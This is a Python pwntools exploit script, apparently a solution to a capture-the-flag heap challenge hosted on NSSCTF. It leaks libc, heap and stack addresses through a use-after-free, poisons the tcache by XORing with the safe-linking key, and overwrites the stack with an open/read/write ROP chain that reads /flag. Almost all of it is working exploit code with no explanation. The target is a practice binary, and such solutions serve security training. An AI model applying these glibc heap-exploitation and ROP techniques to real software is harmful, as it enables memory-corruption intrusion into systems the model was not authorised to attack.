1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102
| from pwn import * from ctypes import * from libcfind import * from LibcSearcher import* import base64 import sys context(os='linux', arch='amd64', log_level='debug') context.terminal = ["tmux","splitw","-h"] debug = 1 if debug: p = process('./pwn') elf = ELF('./pwn') else: p = remote('node4.anna.nssctf.cn', 28531) elf = ELF('./pwn')
s = lambda data: p.send(data) sa = lambda text, data: p.sendafter(text, data) sl = lambda data: p.sendline(data) sla = lambda text, data: p.sendlineafter(text, data) r = lambda num=4096: p.recv(num) rl = lambda text: p.recvuntil(text) pr = lambda num=4096: sys.stdout.write(p.recv(num)) inter = lambda: p.interactive() l32 = lambda: u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00')) l64 = lambda: u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) uu32 = lambda: u32(p.recv(4).ljust(4, '\x00')) uu64 = lambda: u64(p.recv(6).ljust(8, '\x00')) int16 = lambda data: int(data, 16) lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
libc = ELF('./libc-2.33.so') def add(): rl("Choice: ") sl('1') def show(index): rl("Choice: ") sl('3') rl("Idx: ") sl(str(index)) def edit(index,size,content): rl("Choice: ") sl('4') rl("Idx: ") sl(str(index)) rl("Size: ") sl(str(size)) rl("Content: ") sl(content) def delete(index): rl("Choice: ") sl('2') rl("Idx: ") sl(str(index))
for i in range(10): add() for i in range(8,-1,-1): delete(i) edit(0,0x1,'a') show(0) rl("\x0a") libc_leak = uu64()-0x61 lg("libc_leak",libc_leak) libc_base = libc_leak-0x1e0ba0-0x60 lg("libc_base",libc_base) environ = libc_base+libc.sym['_environ'] lg("environ",environ) edit(0,0x1,'\x00') show(8) rl("\x0a") heap_key = u64(p.recv(5).ljust(8, '\x00')) lg("heap_key",heap_key) heap_base = heap_key << 12 lg("heap_base",heap_base) edit(2,0x100,p64(environ^heap_key)) add() add() show(11) rl("\x0a") stack_leak = uu64() lg("stack_leak",stack_leak) edit(5,0x100,p64(0)*2) delete(5) edit(5,0x100,p64((stack_leak-0x138)^heap_key)) add() add() pop_rdi = 0x0000000000028a55+libc_base pop_rdx = 0x00000000000c7f32+libc_base pop_rsi = 0x000000000002a4cf+libc_base open = libc_base+libc.sym['open'] read = libc_base + libc.sym['read'] write = libc_base + libc.sym['write'] payload = p64(0)*2 + '/flag\x00\x00\x00' payload += p64(pop_rdi) + p64(stack_leak-0x128) + p64(pop_rsi) + p64(0) + p64(open) payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(stack_leak) + p64(pop_rdx) + p64(0x50) + p64(read) payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(stack_leak) + p64(pop_rdx) + p64(0x50) + p64(write) edit(13,0x100,payload)
inter()
|